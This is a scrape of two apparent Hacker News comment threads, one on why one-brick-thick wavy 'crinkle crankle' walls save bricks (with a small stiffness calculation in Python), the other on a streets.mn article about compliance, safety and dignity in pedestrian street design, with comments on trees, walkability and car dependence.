This headline is awful and sounds sensational.
A better headline would be 'wavy walls use fewer bricks than thicker straight walls'.
Another 'article' summarizing a reddit post. They even took the top comment and put it at the end
> wavy walls that lawnmowers surely detest!
Lawn edges that can't be mowed, because of a house wall or something, are an issue at my place. If I just leave the grass at the edge, it grows long, then goes to seed, and the long grass seems to expand in width inexorably over time.
I don't want to use a plastic-shedding line trimmer or herbicides. I end up pulling out the grass near the edge, leaving a bare strip that takes a while to grow back, but it's a bit labour-intensive.
I'll save folks some reading: they're comparing a very thick straight wall with a much thinner wavy wall.
The primary point is that you can't make an equivalently thin straight wall due to natural (wind and gravity, primarily) forces. Kinda weird to summarize it without the crux of why.
I feel like everyone thus far is missing something, or perhaps just I am.
I understand that a wavy wall will be stronger than a straight wall of the same thickness, therefore if you need that additional strength it technically uses fewer bricks to reach it.
That said, if the alternative is a 2 layer straight wall, is the wavy wall equally as strong? Or is it just stronger than the single layer wall?
Without knowing anything about the subject matter, I'd assume that the strength goes in order of single-layer straight, wavy, double-layer straight. No? Seems like needing just the amount of strength the wavy wall provides, and no more, would be a fairly rare use case. Leading to double-layer straights most of the time anyway.
Well, tbf the article doesn't even try to explain how wavy walls are stronger than straight ones, or how fewer bricks are needed.
It's a matter of stability more so than 'strength', no? Having never attempted to push over a brick wall, I'd guess that it'd be easier to do so for a straight double wythe than a wavy single... but yeah, baseless intuition here!
The base of a double-wythe wall is still only about 7 inches, and if you're stacking, say, 84 inches of brick on top of that... seems pretty unstable to me.
The wavy design is probably just as strong as the double layer (possibly stronger depending on the direction of force).
The issue with a single layer wall isn't really the strength between bricks, or the bricks themselves - it's that a single layer wall has a very narrow base and is subject to tipping over.
The wave in the design makes the base of the wall act is if it were MUCH wider, preventing the tipping action of a single layer.
So the wavy design is only as strong as single layer of bricks, but it has a base 2 to 3 times the width of even the double layer wall designs. It will be much more resistant to tipping forces, but less resistant to impact forces.
The thing about most walls is they aren't really load bearing - they just delineate owned space - so the wavy design is great for large properties. Much less great if it's a tiny space and you're losing a good chunk of sqft to the wave.
'Strength' is used to refer to things like wind hitting the wall, not a car. That is, the wall toppling, not breaking. So the wavy wall with its wide base is quite strong.
if you think of it from the context that the diagonal length of a brick is its longest dimension, you can start to intuitively imagine how this efficiency in layout pattern is achieved.
There's been a one-brick-thick wavy wall off a busy road in Cambridge for at least fifty years: https://goo.gl/maps/sxTsPW71F317gwK88
It kept getting hit by cars until they finally installed a guard rail.
Driving in the Boston area is hard enough already, we don't need to add wavy walls into the mix ;-)
It took me way too long to see that the cars are driving on the right, so this is Cambridge MA, not Cambridge UK.
Does something about this design make it more likely to get hit by cars?
I guess the force of impact would be greater relative to scraping a straight wall.
The labor to build such a wall may dominate the savings in brick. But if you're building a brick wall, maybe you don't care much about either.
I wonder if this sort of structure could be built by 3D printing, say with concrete or even soil.
Labor is pretty much directly proportional to number of bricks placed. If you save on bricks, you save on labor.
If that was your point, sorry for misreading you.
In the era in which these were commonly used, bricks were largely made on-site or very nearby. So you saved on labor twice - once to make the bricks, and again to place them.
There's actually a similar concept in 3D printing called gyroid infill, it's essentially a 3D version of the wavy wall:
https://www.wevolver.com/article/understanding-the-gyroid-in...
Would it be stronger for the same amount of bricks if it didn't have the inflection point where there is no curvature, and instead had intersecting arcs like: 》》》》 ?
I think it would be less strong than a wavy wall of similar brick count, but still more efficient than an equivalent strength wall built in a straight line.
My mental reasoning for this is that a (pseudo) sinusoid spends a lot more of its path further away from the centre. Thinking of it as a point moving along the path through time, it will dwell at the peaks and cruise through the centre. The contribution of each brick to wall stiffness will be related to the cube of the distance from the centre line (neutral axis), so more 'time' spent at the peaks is best. This holds true on the macro scale, but could vary on the scale of a half 'wavelength', as the lack of inversion of curvature could be beneficial there.
Everything moderately reasonable seems to be better than a straight line in this instance. In the limit, two much thinner walls, far apart, is the optimal solution, but that becomes unreasonable as those walls must be coupled together to provide strength.
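To put rough numbers on the 'cube of the distance from the neutral axis' point, here is a sketch that treats the horizontal cross-section of the wall as a thin strip following y = A·sin(2πx/P) and computes its second moment of area about the wall's centre line. The brick thickness, amplitude and period are assumed values, and mortar and the exact thickness direction are ignored:

import numpy as np

t = 0.10   # wall thickness (one brick), metres - assumed
A = 0.50   # wave amplitude, metres - assumed
P = 2.5    # wave period, metres - assumed

x = np.linspace(0.0, P, 100_000)
y = A * np.sin(2.0 * np.pi * x / P)
ds_dx = np.sqrt(1.0 + (A * 2.0 * np.pi / P * np.cos(2.0 * np.pi * x / P)) ** 2)

# Second moment of area of the wavy strip about the wall's long axis,
# per wave period: I = integral of y^2 * t ds (the small t^3/12 term is ignored).
I_wavy = float(np.trapz(y ** 2 * t * ds_dx, x))

# A straight wall of thickness T over the same run has I = P * T^3 / 12,
# so the equivalent straight-wall thickness for the same stiffness is:
T_equiv = (12.0 * I_wavy / P) ** (1.0 / 3.0)
print(f'I = {I_wavy:.4f} m^4 per period; like a straight wall ~{T_equiv:.2f} m thick')

With these assumed dimensions, a one-brick wavy wall comes out roughly as stiff in bending (against wind pushing it over) as a straight wall around half a metre thick, which is the intuition above made concrete.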
If you made the arcs deeper than the curves of the wave I think yes. If you just sliced and flipped the arcs from the original wave, no. It'd be a straightforward calculation for the moment of inertia but I'm too lazy to do it. It's all about placing the most mass farthest from the centroid line.
I think you're asking if a series of arcs is stronger than a wavy line. It's a great question and I think the answer to that would require a full model of the two walls to calculate all the stresses, etc. But I think it would also depend on the question of 'stronger against what?' A pushing force but at what point and at what angle. Even height might make a difference.
My gut instinct is that the point where a wavy wall changes from curving one way to another is a slight weak point and perhaps an angle there would actually be stronger. Might be totally wrong.
Another reason for some wavy walls involves capturing more heat from sunlight over the course of a day, in this example for nearby plants:
> The Dutch, meanwhile, began to develop curved varieties that could capture more heat, increasing thermal gain (particularly useful for a cooler and more northern region). The curves also helped with structural integrity, requiring less thickness for support.
[0] https://99percentinvisible.org/article/fruit-walls-before-gr...
I learned about this, and a lot more about walled gardens, when I searched for the origin of the term 'walled garden' as it relates to technology today.
Yeah, but they take more space, and are therefore the wrong choice a lot of the time.
Which is why they are very popular in the less densely populated, large-lot areas of the English countryside. By the time of the New World, fast population growth meant the economics of brick production weren't feasible, and copious alternative methods were easier (wood/picket fences, wood studs + wire, chain-link, or wrought iron/brick + iron). All less long-lasting, but cheaper, quicker and easier to install, with almost the same benefits (fencing in pets and livestock, property demarcation, security). Which is why you don't see them nearly as often outside of Europe (Asia having used its own alternatives better suited to its environment and needs, Africa having had New World techniques introduced during colonialism).
Not a physics person...but is this similar to the effect of 'rolling' thin pizza so it won't droop? Or is it strictly about being better at wind resistance?
I see this a lot in the rural US with wooden fences but had no idea why it was done, but I guess its for the same reason (stability). Apparently they've done it since the 1600s.
https://www.louispage.com/blog/bid/11160/worm-fence-what-is-...
Still, this seemed totally unnecessary until I realized it means they don't have to put any posts into the ground. No digging holes, which would be really nice when you're trying to fence very large acreage.
Interesting pictures.
Not a complicated subject, but somehow seeing it with straight lines made it completely obvious and intuitive vs the wavy wall.
The US is so bad at naming things!
A Serpentine Wall sounds better than a Worm Fence or Snake Fence.
Crinkle Crankle Wall is a bit more fun than ZigZag Fence.
A Ribbon Wall seems like a nice thing to have on your property vs a Battlefield Fence.
Not digging post holes would help, but the real time savings would be in not having to saw the logs to produce boards.
It only takes a couple minutes to split the log, and would be less tiring than trying to saw the number of boards you'd need for a fence. You can also use smaller logs you'd otherwise ignore or use for firewood due to low yield when sawing.
For that matter, you don't have to worry about milling, joinery, or bringing enough nails to fasten boards. You can also use green wood without any worries. All you have to do is stack.
In a world without power tools, the split-rail fence really was an ingenious design. It effectively removed the skill requirement altogether, and let you spend your time on more urgent tasks.
I used to make fences in Wales, with its famously rocky ground. The fences we made were effectively straight lines, bound at each terminal point by big posts dug into the ground and braced with side struts. Installing one of these posts could take a full day.
Those fences are also popular in places where it is cold in the winter. No posts in the ground means no frost heave. A fence like that can sit unmaintained for decades before it starts to fall apart.
it's not for stability, it's because it doesn't require posts so it's cheap and quick
No they don't
> [Wavy walls] use more bricks than a straight wall of the same thickness
However they 'resist horizontal forces, like wind, more than straight wall would.'
> So if the alternative to a crinkle crankle wall one-brick thick is a straight wall two or more bricks thick, the former saves material
https://www.johndcook.com/blog/2019/11/19/crinkle-crankle-ca...
If a one brick thick straight wall can't stand, then you don't have a wall you have a pile of bricks. It's pointless to consider the impractical case.
The same reason is why my roof has corrugated metal sheeting, rather than plate.
This was a question I had students prove out. With the bending moment of inertia being related to the cube of the thickness for a flat plate, the maths trickles out very quickly.
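For the cube relationship mentioned there: per unit width of a flat plate, the second moment of area is I = t^3/12, so bending stiffness grows with the cube of the thickness while material use grows only linearly. A toy check (the sheet thickness is just an example):

# Per unit width, a flat plate of thickness t has I = t**3 / 12.
def plate_I(t: float) -> float:
    return t ** 3 / 12.0

t = 0.5e-3                          # 0.5 mm sheet - assumed
print(plate_I(2 * t) / plate_I(t))  # doubling the thickness: 8x stiffer for 2x the metal

Corrugating instead moves the same metal away from the neutral axis, which is why a corrugated sheet beats a flat plate of equal weight.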
We need your expertise here please: https://news.ycombinator.com/item?id=36899973
The important part is https://www.johndcook.com/blog/2019/11/19/crinkle-crankle-ca...
I actually find that web page quite disappointing because there is no comparison of the relative strengths of the different wall shapes.
This feels a bit like diet clickbait...
'use fewer bricks than a straight wall'*
*A straight wall of approximately the strength and length of a wavy wall, not just the length.
My counter would be that from a practical perspective the amount of space wasted by the wavy design seems to negate the usefulness of the design.
Probably makes the lawn crew dizzy when mowing it too!
No space is wasted, unless you need to squeeze a rectangular thing (e.g. a tennis court or driveway) into a tight lot. But boundary disputes in urban areas are already bad enough, so trying to define a wavy boundary won't be fun! That said, how much freaking character would this add to a back garden!
this is an overly cynical take. headlines are brief by necessity. nobody would read that and think that a curved line from A to B is shorter than a straight line between the same points.
the first paragraph explains it,
> these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over
The 'space wasted' on an estate of many hundreds, if not, thousands of acres is minimal. Given that often the bricks used were made and fired on site, it definitely saved on resources and labour.
There's a stately home close to me that has a very short run of one of these walls, and the remains of the old brick kiln up on the hillside. If you know what you're looking for, you can also still see the hollows in the ground where the clay was dug, now full of trees and bushes.
Yes, it's clickbait and nonsense. Obviously a straight wall would use fewer bricks. Your brick wall is going to be one brick thick either way, nobody is going to try to somehow make the straight wall as strong as the wavy wall. Most likely the straight wall is already way stronger than it needs to be.
If you have plenty of space but you're tight on money, it's an ingenious solution.
The solution for the space problem is obvious: just make the wall wave in the longitudinal direction instead of the transversal direction.
> This feels a bit like diet clickbait...
This is fun clickbait. Straight to the point, totally random quirky trivia, and most of the page is nice pictures. Love it.
wikipedia says:
'leading to greater strength than a straight wall of the same thickness of bricks without the need for buttresses.'
I was trying to figure out how lengthwise it could have fewer bricks.
> *A straight wall of the approximal strength and length of a wavy wall, not just length.
The article suggests that, if you attempted to build a straight wall with a similar amount of bricks, that it would not be able to be freestanding (i.e. it would need to be buttressed or it would fall over). That's a significant feature of a wall to some people, so I don't think it's fair to dismiss the utility of that by suggesting that it's simply 'less bricks for comparable strength,' it's 'less bricks for a freestanding wall.'
If you want a freestanding brick wall, this seems to be the 'ideal' way to do it, assuming you have the space required for the wave. I think the space needed would be a function of the wall height, so if you need a tall wall, you need more horizontal space for the wave and a wavy wall becomes less ideal.
The extra space doesn't have to be fully wasted. You could plant bushes or small trees in the concave sections.
Walls have purpose beyond neatly cut lawns.
This wall would work well at road field boundaries where a couple feet makes less practical difference than the large saving in materials.
Every dip in the wave is an opportunity to plant beautiful bush, flowers, or shrubbery.
Amen to this. In a tabloidish sense.
I read the title and thought 'duh'. Maybe others were intrigued and clicked, but for me, this is just obvious. I had lots of Legos, and own more now as a grandpa than, er, uh, I should. I guess spatial reasoning about bricks is just second nature at this point.
What the article likely leaves out is that all of the 'corner only' touch points are going to create a more 'porous' wall. And collection points for crap.
Has someone figured out the ideal frequency / amplitude of the wave? Maybe the frequency that matches the strength of a one-brick straight wall? The pictures strike me as possibly wavier than needed.
It would be a strength/brick-use tradeoff.
I want to know how that compares to just adding some rebar along the way
I've seen this design when making ultra-lightweight structures. It does work but can be difficult to manufacture.
> these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over.
And what about a straight wall with buttresses? Can we make them just as sturdy with fewer bricks?
No, that's sort of the point? There are fewer extra bricks used to make the curve than would be required to buttress / reinforce a straight wall.
'Popularized in England' - maybe popularized, but such walls are by no means popular or common.
'The county of Suffolk seems to be home to countless examples of these crinkle crankle walls. On freston.net you can find 100 wavy walls that have been documented and photographed.'
Although it's not explicitly said, let's suppose that every one of those wavy walls is in Suffolk. The population of the county is 761,350; let's assume there are 100,000 homes (although there is the city of Ipswich, it's otherwise largely a rural county where single-family homes will be common). So only roughly one in one thousand homes in Suffolk has such a 'wavy wall'. Elsewhere in the country probably even fewer - e.g. I've never seen one.
And for everyone complaining about mowing - do you actually have grass all the way up to your boundary wall? In my experience it's pretty common to have a flower bed running the whole length of the boundary, so mowing would not be a problem.
So only roughly one-in-one-thousand homes in Suffolk has such a 'wavy wall'
yes, but you also need to take into account how many homes have any brick wall at all.
If you follow the link in the post explaining the math behind everything, it says:
'They use more bricks than a straight wall of the same thickness but they don't have to be as thick.'
The post also says this in the first paragraph:
> Popularized in England, these wavy walls actually use less bricks than a straight wall because they can be made just one brick thin, while a straight wall—without buttresses—would easily topple over.
In other words, a serpentine wall is stronger per amount of material used than a straight one. It also allows the use of a single thickness of brick without other supports.
True, but they use less bricks than a straight wall of the same strength, because the straight wall would have to be thicker or have buttresses. So it depends what you're doing - does the wall have to withstand that kind of loads or not?
'Uses more bricks than the straight wall' misses the point a bit, because a straight wall like this would easily topple.
A better description is 'uses less bricks than a straight wall of equivalent resistance to horizontal forces'
Very cool. So what is the optimal solution?
To maximize the strength and minimize the bricks used, is a sine the best shape, or is there a better curve, and what is the best period and amplitude of the waveform? Does this solution change with the height of the wall?
Most likely you want the smallest curve that achieves an acceptable amount of stability. Since the wave exists to prevent the wall from toppling, a pure sine is probably overkill.
So I guess a factor then will be how tall your wall is. A very tall wall will need a deep wave, just like a wall one brick high would need no wave at all.
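A back-of-the-envelope way to see the tradeoff (a sketch only, assuming a thin wall of brick thickness t whose plan-view centerline is y(x) = A sin(2πx/λ), small slopes, and ignoring mortar strength and foundations): resistance to toppling under a lateral load scales with the second moment of area of the plan section about the wall line, while brick use scales with arc length.

\[
I_{\text{wavy}} \approx \frac{t A^2}{2} + \frac{t^3}{12}
\quad\text{vs.}\quad
I_{\text{straight}} = \frac{t^3}{12},
\qquad
\frac{L_{\text{wavy}}}{L_{\text{straight}}} \approx 1 + \frac{\pi^2 A^2}{\lambda^2}.
\]

So an amplitude of even one or two brick widths multiplies the toppling resistance by roughly 1 + 6A²/t² while adding only a few percent more bricks, and a taller wall (larger overturning moment) wants a larger amplitude, which matches the intuition above.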
"Hackernews discovers first year university engineering statics/analysis from articles that are really just reposts of 3 year old reddit content"
603 points 3 days ago by PaulHoule in 452nd position
streets.mn | Estimated reading time – 9 minutes | comments | anchor
Have you ever had a friend return from a vacation and gush about how great it was to walk in the place they'd visited? "You can walk everywhere! To a café, to the store. It was amazing!" Immediately after saying that, your friend hops in their car and drives across the parking lot to the Starbucks to which they could easily have walked.
Why does walking feel so intuitive when we're in a city built before cars, yet as soon as we return home, walking feels like an unpleasant chore that immediately drives us into a car?
A lot contributes to this dilemma, like the density of the city, or relative cheapness and convenience of driving. But there's a bigger factor here: We don't design the pedestrian experience for dignity.
This is a national problem, but certainly one we can see throughout our own Twin Cities metro: Even where pedestrian facilities are built, brand-new, ADA-compliant and everything else — using them feels like a chore, or even stressful and unpleasant.
Dignity is a really important concept in active transportation, but one that we often miss in the conversation about making streets better for walking and biking. I've been delighted to see the term appear on a social media account advocating for pedestrians. But as we plan and design better streets for active transportation, we need to consider the dignity of the pedestrian experience.
Three related concepts exist in designing great pedestrian spaces, and they can be arranged similarly to Maslow's hierarchy of needs. The base of the pyramid is the most essential, but having a complete and delightful pedestrian experience requires all three layers. The layers are: compliance, safety and dignity.
At the bottom of the pyramid you have compliance — for pedestrian facilities, that mainly means complying with ADA rules. This requirement is non-negotiable for agencies because failure to obey exposes them to legal challenges. The ADA has done a great deal to make pedestrian facilities better for all — certainly wheelchair users, but also those who walk, use strollers, ride bicycles on sidewalks, etc.
Unfortunately, compliance with ADA rules alone often does not yield good pedestrian facilities.
For example, many agencies will simply remove pedestrian facilities to reduce the cost of compliance. A good example is the intersection of France and Parklawn avenues in Edina. If you were on the west side of France and wanted to walk to the Allina clinic in 2013, you could simply have crossed on the north crosswalk. But to improve ADA compliance, Edina removed the north crosswalk in 2014. Now, you would have to cross the busy signalized intersection three times just to continue on the north sidewalk.
In other cases, compliance is in good faith but not enough to make a pedestrian facility really usable — because complete compliance would entail a much larger project. This can be found when a broken-down sidewalk, or one with obstructions in the way, gets brand-new corner curb ramps but no other improvements. A wheelchair user can easily get up off the street at the corner, but can't go farther than 10 feet without hitting another impediment.
In the middle of the pyramid you have safety — both perceived and actual. It is possible to create a facility that is compliant but does not seem very safe. Picture sparkling new curb ramps to cross a 45-mph surface street with no marked crosswalk. In other cases, facilities are well-designed and safe, but may still not be dignified.
An example of this is in my own backyard, on Hennepin County's Nicollet Avenue. A very-welcome project last year installed new crosswalks to popular Augsburg Park. These have durable crosswalk markings, excellent signage and refuge medians. But crossing still feels like a negotiation with drivers. And the overall sidewalk experience on the 1950s street is still lacking, with sidewalks at the back-of-curb and little to no shade.
Finally, we have dignity. To determine whether a facility is dignified, I propose a simple test:
If you were driving past and saw a friend walking or rolling there, what would your first thought be:
1. "Oh, no, Henry's car must have broken down! I better offer him a ride."
2. "Oh, looks like Henry's out for a walk! I should text him later."
This is a surprisingly good test. Picture seeing your friend on a leafy sidewalk versus walking along a 45 mph suburban arterial. What would you think intuitively?
But to get more specific, these are the key factors in making a pedestrian experience dignified:
A dignified facility needs consistent shade during hot summer months. At night, shadows should be minimal and the route should be clear. Especially when a tree canopy is present, this is best achieved with more individual fixtures installed lower to the ground and at a lower light output. However, a fairly consistent light level can be achieved even with basic cobraheads, as long as there are enough to light the corridor fully.
Routes should be intuitive, easy, and not feel tedious to navigate. Having to make sharp, 90° turns or go out of your way feels awkward and makes you feel like your time and effort are wasted — even if the detour is relatively minor.
It's a very uncomfortable experience to walk along a wide-open corridor with no walls or edge definition — and it's a common experience along suburban arterials, where you may have a wide road on one side and a wide-open parking lot on the other. You feel exposed and vulnerable. At the same time, overgrown sidewalks or ones that encroach on pedestrian space can feel claustrophobic and inconvenient. The right balance is needed.
Finally, engaging frontage is always more appealing than blank frontage. The extreme of this principle is obvious: Walking down a traditional main street is more pleasurable than walking through an industrial park. But even where land uses are similar, engagement of frontage can vary a lot: picture the difference between walking past front doors of houses in a traditional neighborhood, and walking past privacy fences and back yards in cul-de-sac suburban neighborhoods. The traditional neighborhood is more interesting and engaging to walk through.
When I was visiting downtown Northfield, I noted a new building along Water Street (MN-3), which had similar materials to the older downtown buildings on Division: windows, brick, [cultured] stone base. Yet the back was turned to the street, and the experience walking past was undignified.
Creating compliant sidewalks and trails is a high priority for agencies seeking to avoid litigation and serve pedestrians on the most basic level. Although that has some benefits, it isn't enough. Whether it's actively undermining walkability (like removing crosswalks to achieve ADA compliance) or simply not doing enough (adding a new curb ramp to an otherwise wheelchair-hostile sidewalk), we need to go much further.
To make walking and rolling a desirable, everyday activity, we need facilities that are compliant, safe and dignified. We have many examples in our communities of great pedestrian ways — but we have a long way to go to make it universal, and truly move the needle toward walking.
Streets.mn is a 501(c)(3) nonprofit. Our members and donors help us keep Minnesota's conversation about land use and planning moving forward.
I thought (and hoped) this post was going to mention the bizarre american phenomenon where people driving by a person walking have the urge to scream something at them.
The same can be said for virtually any societal change. Want people to proactively fight climate change? It turns out guilting people doesn't work, but give them a dignified existence and they will immediately care about the world they live in.
>but give them a dignified existence and they will immediately care about the world they live in.
What does 'a dignified existence' mean as it relates to climate change?
Is that so? The most dignified, the people with the most money, are also causing the most destruction.
I find it odd to say people are fighting climate change if they actively contribute to climate's destruction. Doing it for a short time with a clearly stated end date would be one thing. However, almost nobody emits less than the crucial threshold of 2 t CO2/year.
At some point you have to admit that if you aren't doing it, you aren't doing it.
Nah, with people who can produce 10s to 100s of times more pollution per person than others, making an individual choice to do better makes little difference.
Certainly learning to make small choices in the right direction (stop denying local net-zero energy projects, switch away from heavy fossil-fuel-consuming vehicles, etc.) is an important individual contribution, but ultimately nothing's going to get done en masse until nations start bullying each other into compliance.
South Africa is a generally developed nation and its energy grid is almost entirely coal. The US is pretty hard on global carbon energy initiatives because it's now a net-positive oil and gas producer. Lower-priced net-zero tech will certainly steer the narrative as time goes on, but will it be fast enough to kill greedy self-interest in the status quo?
How about more driveable cities? There are a few walkies out there, but a stated preference for walking usually comes down to sour grapes (can't afford a car or a move to the burbs), or poor urban planning making driving more onerous than it should be. Dignity is car ownership and the infrastructure to make the most of it.
How about not. It's not sour grapes that people prefer walking, and even if you had a government program to give everyone a car, what then? Congratulations, you've just made more traffic. Cars don't scale. They are super convenient and I will admit to having one (sometimes two!). But affordability isn't the only problem: you still have to deal with what to do when it breaks down, or gets stolen, or is towed, or gets clamped for unpaid parking tickets. There is no dignity in having a shitbox car that's 20 years old and falling apart and is just threatening to break down on you.
I think what's being noticed here, as in many urbanist conversations, is that our urban conditions are primarily reflective of the vastly unequal socio-economic structure we have at large.
In places where the working poor are the most disadvantaged, there also tends to be the highest auto dependency. (Think American South, Panama City, Panama etc)
To soapbox for a moment, almost all of our problems are reflective of our vast inequality. Our ability to live more sustainably, enjoy greater opportunity, form new businesses and households, maintain civic function, etc. is ultimately limited by the degree of inequality a nation faces.
The problem is that the shining example of low-inequality urbanism (Western Europe) achieved this by having effectively the most exclusionary immigration policy in the West for two centuries.
Europe may have great biking culture and equality, but they have effectively sacrificed pluralism.
Don't agree with this at all.
On one hand, it's kind of a tautology - sure, if you're in a city that is very car-dependent, it's a disadvantage to the working poor because owning a car costs money.
But in the US there are also (usually older) cities with relatively great public transportation that are more walkable that also have enormous amounts of wealth inequality.
Doesn't really have anything to do with inequality, in the US at least it's mostly just reflective of when cities were built and developed. Pre-WWII cities like NYC and Boston have (again, relatively) great public transit options and huge walkable parts, while newer cities (often in the South) developed around the car.
A lot of improvement could be made by just enforcing the laws. Many cities across the US allow sidewalk parking, for example. My neighbor has a Tesla Y and his charging station is literally on the sidewalk; he can afford the car but not a house with a garage.
Weird complaint, because it says a lot about political dysfunction in American society when a (mostly) self-driving car costs about $40,000 but a reasonably decent house in the cities where those cars are built costs about 15-20x that, at around $800,000. Let's get rid of arbitrary suburban zoning codes that keep the status quo that makes density and walkability a low priority for "neighborhood character".
I love how the author puts dignity over safety. So timely.
They go hand in hand; unsafe infrastructure is inherently undignified to use. It is both unsafe and undignified to walk in a dirt ditch due to lack of sidewalks.
The pyramid structure is used to illustrate that upper layer concepts are supported by the bottom layer concepts. So, in this case, dignity is less essential than safety. Given safety, one can begin to develop dignity.
In the 'pyramid' style graphic the author uses, dignity being above safety implies that dignity is less essential than safety, not more.
'People should walk!'
Pictures of miles long suburban corridors with no services or business along them.
Maybe.. people don't walk there.. because there's no _reason_ to be walking there.
If you want people to walk, give them a reason other than 'I don't like cars.'
That's what '15 min cities' is about. The YIMBYs also push for accessible amenities, through zoning changes, to make areas more walkable.
You just cited a chief complaint that people against a car-dominated culture have about car culture, as if they had never thought of it - never thought of one of their own major arguments?
Yes, the problem is complex but also easily fixable in the long term: abolish parking requirements, allow building dense buildings, and force building nice sidewalks + trees + bike lanes + safety islands on every street renovation. This way there is no upfront cost to rebuild everything instantly; instead the same public resources will be used (street renovation money is already allocated) and the town will become more walkable gradually.
Agree and disagree with the article. I was an intern at a local government's Americans with Disabilities Act (ADA) office for a year. It was a city with history, and not very good city planning at the start. Yes, you need compliance; the reality is, it is very hard. It's like you built everything on top of a single MySQL instance and then face the scalability challenge, so you need to re-shard every six months - and worse, re-architecting a city poses much more complex problems.
Well, as long as municipalities offer a fraction of what you can make on the free market those systems will never be adequate.
[flagged]
> Please don't post shallow dismissals, especially of other people's work. A good critical comment teaches us something.
I spent a few weeks recently cycling from LA to the Mexican border across non-coastal Southern California. Zero complaints about cycling in that part of the USA: I was pleased by how many hard shoulders had been turned into bike lanes, and drivers seemed courteous.
But man, was walking in towns a drag. If I left the bike safely at a hotel and wanted to stroll over to a restaurant or supermarket, every intersection was button-operated traffic lights where pedestrians wait ages for their turn to cross. Then, the pedestrian light flashes for almost too little time to cross the six or seven lanes of traffic. The sheer width of ordinary US roads must have a deterrent effect.
> I was pleased by how many hard shoulders had been turned into bike lanes, and drivers seemed courteous.
But how many are protected bike lanes, instead of just paint? Painted bike lanes are only helpful for relatively confident cyclists, and obviously do virtually nothing to actually protect people on bikes. Imagine if we started replacing sidewalks with painted walk lanes!
> The sheer width of US roads must have a deterrent effect.
Yup. In Munich, not only are roads generally not as wide, but if they're even sorta wide, they get a pedestrian island or two.
If we want a shift to walking, we need cities to plant around 100x the number of trees they have.
Ever walk through an old, mature neighbourhood? Usually there are tons of people on the sidewalks, and a primary reason is that there are mature trees providing plenty of shade.
Then try walking in a new neighbourhood with barely any shade. It is awful.
One of the fundamental axioms of traffic engineering is you can't have trees too close to the edge of the road, because drunk/speeding drivers might get hurt. It is not just that the neighborhoods are mature enough for trees to have grown in, it's that they predate this science.
https://highways.dot.gov/safety/rwd/provide-safe-recovery/cl...
People walked under sun since forever. That's what hats are for. What you're really saying is walking under the sun crosses a discomfort threshold for you which driving and walking under shade doesn't.
I like mature trees and love walking among them (e.g., downtown Sacramento). In 99% of the US more trees would be better (and I try to contribute by planting an acorn or other tree seed when I spy a place a sapling might not get mowed, wherever I go). But I still consider more trees a distant second to buildings closer together, without room for trees (or, as typical, empty space or junk). If there's room for many mature trees, the place is fundamentally not dense enough to be totally amazing for a life of walking, as opposed to walking tourism.
That would help, but there are plenty of walkable cities with not-great tree cover.
I don't think Barcelona or Tokyo are gonna win any awards for having lots of trees.
I'm curious what the rates of walking are in Sacramento now, given that it's got that whole 'City of Trees' moniker and is also hot as Hell during the summer. I've honestly never been there in the summer, so I couldn't even share anecdotes. I'm not finding anything useful on Google.
What you say makes sense, when I walk in my own (new-ish development) neighborhood in Orange county, I specifically go to the areas where trees are more developed and provide more shade.
We had trees, they ripped them out in the name of safety.
'A drink driver might swerve off the road' killed so many old growth trees in the US.
100%; the lack of tree cover everywhere is criminal.
Three sticking points in my experience trying to help manage street trees in a neighborhood of 400 homes:
1. Planter strips are too small. This leads to infrastructure conflicts that are costly like lifting sidewalks and exploding irrigation lines. The problem is many municipalities simply have standard streets too wide and planters too narrow.
2. Maintaining trees is an ongoing expense and if not managed by an HOA or municipality the costs explode as individuals have to pay a crew to drag out equipment for just a few trees.
3. Lack of mandatory diversity: my neighborhood is 60% ash because the builder got a good deal 15 years ago, after the emerald ash borer was found out east but wasn't top of mind in the west yet. If the EAB gains a strong foothold, entire blocks will be starting from zero again.
I don't think the tree has much to do with it. While shade is important and should be even more so going forward, the general scale of new neighbourhoods compared to old ones is dramatically different.
It's like homes used to be so much closer to the sidewalk, it was just a couple of steps to reach the sidewalk and get going, but now it's these giant football field widths separating homes from the sidewalk, and then massive 4 lane sized roads separating sidewalks on either side. I'm exaggerating of course but the point is still there, the scale is just so different planting trees won't solve it.
This difference in scale creates such a different atmosphere, where sidewalks are just for dog walkers and bored baby sitters, not for regular commute. It's like if you want to talk to your neighbour from the sidewalk you have to bring a megaphone.
Can't upvote this enough. In Austin, with us on track to break the record for consecutive 100+ degree days, there is a huge difference between walking along nice, shaded areas and barren sidewalks. The trees don't even need to be that 'mature' - I've seen new developments plant grown trees that only take a couple of years to really expand.
Like the blog post and other commenters mentioned, it's not just trees alone but especially in hotter climates it can make all the difference.
Unfortunately trees are often seen as a danger to car drivers on roads over a certain speed limit so traffic engineers dislike them.
Then try walking in a new neighbourhood with barely any shade. It is awful.
Love how south-centric this statement is. In Northern countries, that's true for a month typically, otherwise 'oh god please I hope the sun will shine on me'.
In December, I see 4 hours of sun, where the light gets above tree tops. And that's in Southern Canada!
Not a hatred of trees, but a dislike of shade trees.
edit: until I visited Texas, I never understood why people wore hats. The sun is never hot enough here for it. It never gets as high in the sky. Yet it's a brutal beast in Texas. I can only imagine further south..
Yes. Something like this https://twitter.com/Cobylefko/status/1682029080538136579
> Then try walking in a new neighbourhood with barely any shade. It is awful.
Neighborhoods you'd typically want to walk in do have shade because they were all built a long time ago and there is somewhere for you to walk to. Suburban neighborhoods aren't designed that way which is why even if there was shade there's still nowhere to walk to.
I do agree we need more trees planted and more shade. Unfortunately a lot of the space near and around places people would want to walk or bike to is instead covered in pavement for cars and parking.
We can do more than one thing at once though. We can make areas more walkable while we also plant trees. And we can flip state highway departments [1] so that they focus on serving the people and their needs instead of themselves or a small, vocal minority.
[1] Note that departments of transportation in nearly all states are highway and road transit departments first and do next to nothing w.r.t better means of transportation. Their entire context is cars and drivers and you can confirm this by looking at the budget.
I spend lots of time walking through old, mature neighbourhoods with mature trees. Usually the sidewalks are empty, because stuff is too spread out to be walkable, and there just aren't enough people for sidewalks to be full. Yes, mostly in the US, but I've also observed this outside the US. Leafy+dense enough to be vibrant areas are really nice, but the exception. The thing that really makes new neighborhoods awful for walking isn't lack of shade, it's everything else about the new neighborhood, typically built in an extremely car-centric manner.
I didn't have a car between college and my late 30s. I thought I was a pro-walking chauvinist but turns out I was just a single guy living in NYC. Within a year of our first kid, I was living in the burbs with a large SUV.
